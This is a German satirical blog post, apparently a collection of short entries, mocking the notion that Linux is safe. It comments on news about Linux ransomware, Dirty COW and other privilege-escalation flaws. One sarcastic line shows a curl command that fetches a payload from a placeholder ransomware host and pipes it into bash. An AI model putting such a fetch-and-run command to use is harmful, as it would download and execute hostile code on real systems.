Was habe ich darauf gewartet!

Unter linux gibt es kein ausreichenden softwäjhr-angebot? Das ändert sich. ENDLICH gibt es erpressungstrojaner auch für linux-sörver!!!1!elf!!

Bleibt nur eine offene frage: das ding braucht offensichtlich root-rechte, um sich über GRUB melden zu können. Wie kann man einem linux-sörver einen trojaner unterjubeln. Ich sehe da (bei debianoiden systemen) folgende möglichkeiten:

  • PPAs wurden gepwnt. Der admin ist eine schlafmütze und hat PPAs auf einem sörver eingetragen, die dann halbautomatisch sein system mitwarten. (Die alternative ist es, kwelltextpakete nach abgleich der prüfsumme selbst zu kompilieren.) Das bildschirmfoto zeigt einen unbuntu-GRUB, deshalb scheint mir ein PPA gar nicht unwahrscheinlich zu sein.
  • Fiese debian-fehler, die bei der unnötigen umstellung des paketmänätschments aufgetreten sind, wurden ausgebeutet.
  • Über irgendeine kombinazjon verschiedener „kleiner“ fehler, die ein admin aus furcht vor problemen auch mal völlig ungefixt lässt, kam es zur rechteausweitung und zur ausführung von kohd mit root-rechten. Etwa, wenn es durch einen fehler in websörver oder in einer darauf laufenden anwendung möglich geworden ist, kohd mit den rechten des websörvers auszuführen, um dann dirty COW zu benutzen, um root zu kriegen.

Wie es auch sei, eines wirkt dumm an diesem trojaner: warum handelt es sich um die linux-variante eines windohs-schädlings. Gerade ein un*xoides betrübssystem macht es im grunde sehr einfach, einen derartigen trojaner zu schreiben. Sogar die implementazjon in einem shellskript wäre bekwem möglich. Kurz: die leute, die das gemacht haben, sind vermutlich ein bisschen dumm. Dabei braucht nicht einmal eine temporäre datei (die bei einer analyse den privaten schlüssel verraten und eine entschlüsselung ermöglichen könnte) auf einem datenträger abgelegt zu werden, es gibt doch pipes:

# curl -L http://get.ransomware.example.com/?for=some_id | bash

Un*xoide betrübssysteme haben eben ihre ganz eigene eleganz… :mrgreen:

Aber: welche schlafmütze von admin hat keine bäckups vom sörver? Oh… 😦

Aber die jagd ist eröffnet. Inzwischen haben ja doch so einige ganz normale anwender ein linux-system als desktoprechner, und viele von ihnen dürften sich sehr sicher fühlen, weil sie ja nicht dieses gefährliche windohs benutzen und deshalb alle vorsicht fahren lassen… da wird die überraschung dann böse, wenn beim hochfahren auf dem bildschirm „gib mir bitcoin, oder du siehst deine daten nie wieder“ steht.

Lasst euch kein antivirus-schlangenöl für linux aufschwatzen! Die scheiße funkzjoniert schon unter windohs nicht und reißt tendenzjell eher noch größere sicherheitslöcher auf. Lernt lieber etwas über den kompjuter, den ihr benutzt, klickt nicht auf alles, was sich anklicken lässt und seht zu, dass ihr immer ein aktuelles system habt. Die beste antivirus-softwäjhr ist das gehirn.

Linux des tages

Linuxnutzer. Das sind die menschen, denen man auf einer webseit für linuxnutzer erklären muss, dass man sich den verwendeten desktop mit ein paar klicki-klicki klicks anpassen kann und wie das geht. Hach, was waren das noch für schöne zeiten, als die mehrzahl der linuxnutzer keine kompjuteranalfabeten waren!

Und ja, in diesen zeiten war es durchaus brauchbarer und nützlicher content, wenn jemand eine kleine einführung in die einrichtung eines FVWM geschrieben hat. (Das dingens war mein liebling, bevor KDE, GNOME und XFCE kamen. Und wenn man keine angst davor hat, sich einen windowmanager mit einem texteditor zu konfigurieren und sich von angestaubten und gereiften konzepten nicht erschrecken lässt, ist FVWM unglaublich gut anpassbar.)

„Mit linux wär das nicht passiert“ des tages

Über eine manipulierte .crash-Datei könnte ein Angreifer beliebigen Python-Code mit den Rechten des angemeldeten Users zur Ausführung bringen. Mit einer Variante des Tricks könnte sich ein Angreifer sogar die Zustimmung des Users erschleichen, Code mit Root-Rechten auszuführen

Tolle programmierleistung bei unbuntu! Dass so etwas wie ein eval mit irgendwelchen daten immer eine gefährliche sache ist, ist nicht so schwer einzusehen. Und hej, es gibt kriminelle, die bereit sind, zehntausend dollar für einen ausbeutbaren fehler eines populären linux-desktopsystems hinzublättern. Da sage noch mal einer, für linux interessiert sich wegen der geringen verbreitung niemand. Wo gezahlt wird, haben sich noch immer ein paar leute gefunden, die sich auch bezahlen lassen…

Schlangenöl des tages

Sicherheitspatches:
McAfee VirusScan Enterprise gefährdet Linux-Systeme

Na, wenn man mit linux schon — vor allem, weil es immer noch so wenig verbreitet ist, dass es sich für die verbrecher nicht lohnt — keine probleme mit schadsoftwäjhr hat, dann muss man sich doch wenigstens probleme und klaffende sicherheitlöcher durch irgendwelche schlangenöle gegen schadsoftwäjhr holen. Sonst würde einem ja was fehlen… :mrgreen:

„Mit linux wär das nicht passiert“ des tages

Durch eine Lücke im Linux-Kernel können sich lokale Nutzer erhöhte Rechte verschaffen und so Code mit Root-Rechten ausführen. Betroffen sind potenziell sämtliche Linux-Distributionen sowie Android […] Die Lücke klafft seit fünf Jahren im Kernel

Gibt es eigentlich distribuzjonen, die „unprivileged user namespaces“ standardmäßig einschalten?

Ja.

$ sysctl -a 2>/dev/null | grep unprivileged 
kernel.unprivileged_bpf_disabled = 0
kernel.unprivileged_userns_clone = 1
$ _

Das ist unbuntu gewesen. Damit betreiben manche leute sogar ihre server. Wenn aus dem $-prompt ein # werden kann, ist das ein verdammt dickes sicherheitsproblem. Und wer jetzt „aber dafür muss man erstmal einen lokalen user haben“ denkt, der denkt nicht an die vielen unter linux laufenden internet-der-dinge-dinger, die häufig einen login mit einem standardpasswort zulassen, aber dafür wohl eher selten ein halbwegs sicher und vernünftig konfiguriertes system haben. Die werden eher noch mieser als unbuntu konfiguriert sein…

Irgendwann werden gelangweilte kinder mit einem botnetz aus techniktinnef, der unter dem angeblich so „sicheren“ linux läuft, einfach die zivilisazjon ausknipsen, wenn das so weiter geht… 😦

„Mit linux wär das nicht passiert“ des tages

Durch ein fatales Zusammenspiel mehrerer Komponenten können Angreifer offenbar leicht Schadcode in Fedora-Linux einschleusen. Das Opfer in spe muss lediglich eine verseuchte Webseite aufrufen, um sich einen Schädling einzufangen

Ist doch toll, dass endlich die bekwemlichkeit von windohs unter linux einkehrt. Tolle webbrauser, die dateien runterladen, ohne dass der benutzer es mitkriegt, damit er auch ja nicht umständlich einen speichern-unter-dialog beklicken muss; tolle indizierungsdienste, die dann irgendwann später die runtergeladenen dateien verarbeiten; tolle dateimanätscher, die vorschaubilder von allen möglichen dateitypen anzeigen und dafür ebenfalls die runtergeladenen dateien verarbeiten. Endlich kommt auch jeder vollhonk mit linux klar. Oder fühlt sich zumindest so, als ob er damit klarkäme, weil er einfach nicht mehr über irgendetwas nachdenken muss. Und auch jedes häckkind kommt ganz wunderbar klar:

Das war viel zu einfach. Es sollte nicht möglich sein, in ein paar Minuten einen ernstzunehmenden Speicherfehler in einer standardmäßigen Linux-Konfiguration zu finden. Auch wenn es mir schwer fällt, das zu sagen, aber das ist nicht die Art von Situation, die man bei einer Standardinstallation von Windows 10 vorfindet. Kann es sein, dass die Sicherheit von Linux auf Desktops verrottet ist?

:mrgreen:

Ja, das kann sein. Die frühere linux-sicherheit bestand immer auch darin, alles so einfach wie möglich zu halten, und das machen die großen linux-distriubtoren heute nicht mehr. Was als sicherheit übrig bleibt, ist die schlichte tatsache, dass linux trotz dieses griffes der großen distributoren nach dem massenmarkt immer noch so wenig verbreitet ist, dass sich aus der sicht der meisten einfachen kriminellen angriffe nicht lohnen. (Das argument gilt aber weder für geheimdienstlich interessante rechner noch für wirtschaftsspionahsche. Es gilt auch nicht)

Na ja, wer krohm als brauser benutzt, hat sowieso verloren. Leider kommt man manchmal nicht drumrum. Die vmware-vsphere-client-kacke lässt sich zum beispiel unter linux nur mit krohm bedienen. Da kommen gefühle wie aus den späten neunziger jahren auf, als es webseits gab, die nur mit einem bestimmten brauser richtig funkzjonierten! „Best viewed with internet exploiter 4.0 and a resolution of 800×600 pixels“. Wie schafft man das eigentlich heute noch, ein webfrontend so total zu verkacken, dass es nur mit einem einzigen kackbrauser läuft?! Das muss doch vorsatz sein. Vorsatz von vollidjoten. Löcher, aus denen gedanken wie „ich habe einen lieblingsbrauser, und ich zwinge dich jetzt, den zu benutzen“ herauskwellen. Ach!

Da wäxt zusammen, was schon lang zueinander strebt…

Microsoft schließt sich der Linux Foundation an

Wenn jetzt noch jemand rauskriegt, dass der systemd klandestin von meikrosoft vorangetrieben wurde, ist ja alles klar. Das zu erwartende weitere vorgehen von meikrosoft ist wohlbekannt… 😦

Kennt ihr eigentlich diese olle, gegen linux gerichtete meikrosoft-FUD-reklame noch? Daran muss ich gerade ganz heftig denken, wenn ich solche schlagzeilen sehe.

Apropos FUD-reklame… und jetzt eine kleine werbeunterbrechung:

8 out of 10 terrorists use GNU/Linux systems. If you support Open Source software, you support terrorism.

Nein, das ist keine satire. Das ding hat meikrosoft wirklich im schatten der 9/11-anschläge geschaltet. Aber nicht sehr lange, weil eigentlich kein mensch, der noch ein bisschen knusper ist, auf die idee käme, einen websörver unter windows zu fahren.

„Mit linux wär das nicht passiert“ des tages

Ist hier jemand paranoid und benutzt ein linux mit einer verschlüsselten festplatte?

Nun ja, das system zerstören kann man auch mit einen hammer, und wenn jemand an einen rechner fysikalisch drankommt, ist es sowieso eine schwierige sache mit der kompjutersicherheit, denn die festplatte kann man auch einfach ausbauen und mitnehmen (oder auf einem zweitgerät ein image kopieren), um sie in ruhe zu analysieren.

Aber ein fehler ist nun mal ein fehler, und eine root-shell ist immer ein ziemlich dicker fuß in der tür. Damit könnte man auch „schnell“ einen eigenen bootloader installieren, der das passwort für die entschlüsselung mitschneidet. Aber das kann man ja auch, wenn man von einem USB-stick hochfahren kann, außer, so etwas wurde im BIOS abgeschaltet und das BIOS wurde ebenfalls durch ein passwort geschützt…

Kurz: es ist nicht die mutter aller sicherheitslücken, aber schon ein bemerkenswert schwerer fehler, der nicht passieren darf.

„Mit linux wär das nicht passiert“ des tages

Die Sicherheitslücke (CVE-2016-5195) hätte von lokalen Nutzern dazu missbraucht werden können, Dateien zu überschreiben, für die sie lediglich Leserechte haben. Auf Linux-Systemen lassen sich so unter anderem die eigenen Nutzerrechte auf Root-Rechte ausweiten.

Die Schwachstelle existiert in ihrer aktuellen Form mindestens seit Kernel 2.6.22 – also seit über neun Jahren

Weia!

Security des tages

Hat her vielleicht jemand einen mit debian (oder einer beliebigen debian-artigen distri) betriebenen websörver nebst… örks!… tomcat-applikazjonssörver, auf dem auch eine… örks!… vielleicht mit kleinen schwachstellen ausgestattete tomcat-applikazjon läuft und lädt jetzt gerade die ganze welt dazu ein, mal ohne großen aufwand root auf dem sörver zu werden?

Mit linux wär das nicht… oh! :mrgreen:

„Mit linux bist du sicher“ des tages

Es ist durchaus möglich, dass in naher Zukunft neue Ransomware-Varianten in Python oder anderen Scriptsprachen geschrieben werden um Plattform (Linux, MacOS usw.) unabhängig zu sein

Auch, wenn man ein weniger gegen unmittelbare nutzerdummheit anfälliges betrübssystem hat, muss man eben an kompjutersicherheit denken. Das größte problem für einen linuxangreifer ist es, sein opfer zum ausführen von programmkohd zu bringen — unter windohs reicht ein entsprechender dateiname und ein dummer doppelklick des opfers. Deshalb wird die meiste windohs-schadsoftwäjhr zurzeit über spämm der marke „öffne das dokument im anhang, um zu erfahren, was ich dir überhaupt sagen will“ verteilt. Die linux-varianten werden sicherlich über werbebanner mit schadsoftwäjhr unter ausbeutung von brauser- und addonfehlern verteilt werden… da freut man sich doch gleich doppelt, dass adblocker nach meinung von EU-lobbyisten mit jornalismus- und presseverlagshintergrund und nach meinung von kommissar Oettinger demnächst kriminalisiert werden sollen! 😦

„Mit linux wär das nicht passiert“ des tages

Ransomware Fairware mit Fokus auf Linux-Systeme

Fragt sich nur noch, wie das dingens auf den sörver kommt… aber da gibts genug möglichkeiten. Einen kleinen trojaner auf einen kompjuter platzieren, mit dem das sörverchen administriert wird — das ist ja oft ein windohs-gerät — und alle tastatureingaben mitschneiden wäre eine. Die verseuchung des webbrausers mit irgendeinem addon und das mitschneiden der bedienung irgendwelcher webadmin-frontends wäre eine andere. Und einfach eine große liste häufiger passwörter durchprobieren — es gibt immer noch bemerkenswert viele brute-force-versuche — wäre die dritte.

Aber hej, wer keine datensicherung hat, der hat auch keine daten, auf die es ankommt… 😈

Ubuntu des tages

Habt ihr das auch gehört, dass dieser systemd, den sie in jede größere linux-distribuzjon verbauen, doch wenigstens dazu führt, dass linux schneller hochfährt? :mrgreen:

Übrigens: je häufiger ich den systemd irgendwo in freier wildbahn sehe, desto häufiger denke ich mir, dass das ganze dingens im grunde nur der versuch ist, die flexibilität eines microkernels auf den aufgeblähten linuxkernel draufzufrickeln. Wer hochhäuser auf die fundamente von holzhütten baut, darf sich nicht wundern, wenn das ergebnis nicht sonderlich stabil ist…

Wenn die systemd-entwickler ihr gehirn benutzen würden, dann würden sie doch gleich an GNU hurd mitarbeiten. Ach, da gibts keinen ruhm mehr? Na, wenn das die einzige motivazjon ist!

Mit linux wär das nicht passiert…

…denn linux ist sicher und nicht anfällig. Außer, es gibt mal wieder ein „kleines problemchen“ wie das heutige:

Forscher der Universität California Riverside (UCR) haben ein Problem im Transmission Control Protocol (TCP) entdeckt, die alle Linuxe mit Kernel 3.6 und jünger und auch Android-Systeme betreffen soll.

Die Lücke ermögliche Angreifern den remote Zugriff auf die Internet-Kommunikation der Nutzer

Heilige scheiße! Natürlich ist auch TOR davon betroffen.

Schneller nachtrag: weil hier gerade jemand „wer hat denn noch so einen ollen 3.6er-kernel, das problem betrifft nur eine minderheit“ raunte. Die hervorhebung hier ist von mir:

[…] alle Linuxe mit Kernel 3.6 und jünger […]

Und „jünger“ ist das antonym zu „älter“.

Manchmal scheint die begeisterung für linux echt ein bisschen auf die allgemeine lesefähigkeit zu gehen… :mrgreen: